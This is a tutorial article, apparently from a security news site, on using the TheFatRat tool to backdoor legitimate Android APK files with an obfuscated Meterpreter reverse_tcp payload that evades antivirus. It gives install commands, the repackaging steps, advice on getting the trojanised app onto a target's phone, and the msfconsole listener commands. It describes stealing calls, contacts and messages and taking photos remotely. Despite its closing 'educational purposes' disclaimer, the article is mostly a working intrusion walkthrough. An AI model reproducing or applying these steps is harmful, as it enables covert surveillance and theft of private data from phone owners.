TheFatRat is a simple Android RAT tool to build a backdoor and post-exploitation attacks like browser attacks.
This Android RAT tool produces malware with mainstream payload and afterward, the perfectly crafted malware will be executed on Windows, Android, and Macintosh.
Malware generated through TheFatRat has the ability to bypass Antivirus. Bypassing AV & Firewalls allow attackers to gain a Meterpreter session.
Automating Metasploit functions in this Android RAT
- Create a backdoor for Windows, Linux, Mac, and Android
- This Android RAT Bypass antivirus backdoor
- Checks for Metasploit service and starts if not present
- Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android, and Mac and another
- Start multiple meterpreter reverse_tcp listeners
- Fast Search in searchsploit
- Bypass AV
- File pumper
- Create a backdoor with another technique
- Autorun script for listeners ( easy to use )
Gaining access to Targeted Android Phones – Android RAT (TheFatRat )
You can download this Android RAT tool TheFatRaT from GithubÂ
git clone https://github.com/Screetsec/TheFatRat.git
Once this command is executed it would clone and store under TheFatRat.
cd TheFatRat
Then we need to provide execute permission and run setup.sh
chmod +x setup.sh && ./setup.sh
Installation would take 10 to 15 minutes, during the process it checks for missing components if anything missing it will automatically download and install it.
Also Read Bypass an Anti Virus Detection with Encrypted Payloads using VENOM Tool
Once installation is completed you will be provided with the list of options to create a payload.
In this Kali Linux Tutorial, we go on backdooring with the original APK file, so we need to select option 5 here.
In the mean, we should have downloaded any popular Android application file APK and then need to enter the path of the file.
Once it has been done all we need to select the Meterpreter to use, here we have selected reverse_tcp.
And then you need to select the tool to be used in APK creation.
APK build-in process decompiles the original APK to insert payloads and then recompiles the application. It uses obfuscation methods to include payloads also it appends a digital signature.
Once you have the payload created with the original APK file you can move it to mobile phones through File transfer or any other way.
Then we need to set up me meterpreter session through msfconsole.
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)
exploit
Once the application is installed, you will get the meterpreter session and complete control over the device.
By typing ‘help‘ you can find all the possible commands to execute.
in this Android RAT tool, You can dump calls, contacts, messages and even you can snaps with the mobile remotely.
Credit to the TheFatRat Authors team for building such an Awesome and easy to implement this Android RAT tool.
Disclaimer
This article is only for Educational purposes. Any actions and or activities related to the material contained within this Website are solely your responsibility.
The misuse of the information on this website can result in criminal charges brought against the persons in question.
The authors and www.gbhackers.com  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information on this website to break the law.